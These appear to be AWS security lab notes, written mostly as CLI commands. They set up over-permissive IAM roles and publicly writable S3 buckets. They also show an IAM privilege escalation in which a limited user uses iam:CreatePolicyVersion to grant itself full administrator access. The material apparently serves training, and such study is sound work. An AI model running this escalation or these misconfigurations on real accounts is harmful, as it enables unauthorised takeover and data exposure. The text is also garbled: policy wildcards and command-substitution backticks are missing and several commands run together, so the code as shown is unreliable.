#overly permissive IAM roles
aws iam create-user --user-name s3ReadUser --tags Key=createdFor,Value=masterclass --profile masterclass aws iam attach-user-policy --user-name s3ReadUser --policy-arn arn:aws:iam::aws:policy/AmazonS3FullAccess --profile masterclass
aws iam create-user --user-name EC2DescribeOnlyUser --tags Key=createdFor,Value=masterclass --profile masterclass aws iam attach-user-policy --user-name EC2DescribeOnlyUser --policy-arn arn:aws:iam::aws:policy/AmazonEC2ReadOnlyAccess --profile masterclass aws iam create-group --group-name EC2ManagementUsers --profile masterclass aws iam attach-group-policy --group-name EC2ManagementUsers --policy-arn arn:aws:iam::aws:policy/AmazonEC2FullAccess --profile masterclass aws iam add-user-to-group --user-name EC2DescribeOnlyUser --group-name EC2ManagementUsers --profile masterclass
aws iam create-role --role-name EC2RDSReadRole --assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ec2.amazonaws.com"},"Action":"sts:AssumeRole"}]}' --tags Key=createdFor,Value=masterclass --profile masterclass aws iam attach-role-policy --role-name EC2RDSReadRole --policy-arn arn:aws:iam::aws:policy/AmazonRDSFullAccess --profile masterclass aws iam attach-role-policy --role-name EC2RDSReadRole --policy-arn arn:aws:iam::aws:policy/IAMFullAccess --profile masterclass aws iam attach-role-policy --role-name EC2RDSReadRole --policy-arn arn:aws:iam::aws:policy/AmazonEC2FullAccess --profile masterclass
#iam privilege escalation using policy version rollback , we can set default policy as well to previous version and escalate
Run an admin command like list-users to see that the limiteduser has no access
aws iam list-users --profile masterclasslimiteduser
Identify the policies attached to the user using the new profile with AWS CLI
aws iam list-attached-user-policies --user-name limiteduser --profile masterclasslimiteduser
Get the version of the identified policy - policyversionmanager
aws iam get-policy --policy-arn POLICY-ARN --profile masterclasslimiteduser
Get the permissions attached to the policy for version v1 - policyversionmanager
aws iam get-policy-version --policy-arn POLICY-ARN --version-id v1 --profile masterclasslimiteduser
One of the permissions attached is "iam:CreatePolicyVersion"
We can use this to create a new version of the attached policy with privileged access
aws iam create-policy-version --policy-arn POLICY-ARN --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"","Resource":""}]}' --set-as-default --profile masterclasslimiteduser
Run an admin command now to confirm your privileges have escalated to AWS AdministratorAccess
aws iam list-users --profile masterclasslimiteduser
#iam privilege escalation based on groups
AMI catalog:
https://us-east-1.console.aws.amazon.com/ec2/home?region=us-east-1#AMICatalog:
From console we can see the public AMI's which might be backdoor ami's as well.
Navigate to EC2 > AMI Catalog and find the “masterclass” AMI under Community AMIs
For AWS CLI ...
Run the following command to find AMIs belonging to the account 511522223657
aws ec2 describe-images --owners 511522223657 --profile masterclass
aws ec2 describe-images --owners 511522223657 --query 'Images[*].[ImageId, Name, PlatformDetails]' --profile masterclass
aws ec2 describe-images --filters "Name=name,Values=session5-warfare" --profile masterclass
#use instance id to see if volume is encrypted or not
Use the instance id to enumerate attached volumes (also visible in the UI)
aws ec2 describe-instances --instance-ids --query "Reservations[].Instances[].BlockDeviceMappings[].Ebs[].VolumeId" --region us-east-1 --profile masterclass
aws ec2 describe-volumes --volume-ids --query "Volumes[].Encrypted" --region us-east-1 --profile masterclass
#Use the snapshot id to check for encryption status (also visible in the UI)
aws ec2 describe-snapshots --snapshot-ids snap-043dabe339601b7a0 --query "Snapshots[].Encrypted" --region us-east-1 --profile masterclass
#ec2 misconfigurations
Check the security groups for inbound rules
SSRF using IMDS
Access and passrole , using policy version
#s3 bucket
export UNAME=curl -s http://x41.co/random.php
export bucketname=$UNAME-public-bucket
aws s3api create-bucket --bucket $bucketname --region us-east-1 --profile masterclass aws s3api put-public-access-block --bucket $bucketname --public-access-block-configuration "BlockPublicPolicy=false" --profile masterclass aws s3api put-bucket-ownership-controls --bucket $bucketname --ownership-controls="Rules=[{ObjectOwnership=BucketOwnerPreferred}]" --profile masterclass wget https://aws-masterclass-data.s3.amazonaws.com/session3/boat.jpg wget https://aws-masterclass-data.s3.amazonaws.com/session3/public.txt aws s3api put-object --bucket $bucketname --key boat.jpg --body boat.jpg --profile masterclass aws s3api put-object --bucket $bucketname --key public.txt --body public.txt --profile masterclass aws s3api put-bucket-acl --bucket $bucketname --acl public-read-write --profile masterclass
export objbucketname=$bucketname-public-objects
aws s3api create-bucket --bucket $objbucketname --region us-east-1 --profile masterclass aws s3api put-public-access-block --bucket $objbucketname --public-access-block-configuration "BlockPublicPolicy=false" --profile masterclass aws s3api put-bucket-ownership-controls --bucket $objbucketname --ownership-controls="Rules=[{ObjectOwnership=BucketOwnerPreferred}]" --profile masterclass aws s3api put-object --bucket $objbucketname --key boat.jpg --body boat.jpg --profile masterclass aws s3api put-object --bucket $objbucketname --key public.txt --body public.txt --profile masterclass aws s3api put-bucket-acl --bucket $objbucketname --acl public-read-write --profile masterclass aws s3api put-bucket-policy --bucket $objbucketname --policy "{"Version":"2012-10-17","Statement":[{"Sid":"PublicRead","Effect":"Allow","Principal":"","Action":["s3:GetObject"],"Resource":["arn:aws:s3:::$objbucketname/"]}]}" --profile masterclass
export aclrwbucket=$UNAME-bucket-acl-rw
aws s3api create-bucket --bucket $aclrwbucket --region us-east-1 --profile masterclass aws s3api put-bucket-ownership-controls --bucket $aclrwbucket --ownership-controls="Rules=[{ObjectOwnership=BucketOwnerPreferred}]" --profile masterclass aws s3api put-public-access-block --bucket $aclrwbucket --public-access-block-configuration "BlockPublicPolicy=false" --profile masterclass aws s3api put-bucket-acl --bucket $aclrwbucket --grant-read-acp uri=http://acs.amazonaws.com/groups/global/AllUsers --grant-write-acp uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers --profile masterclass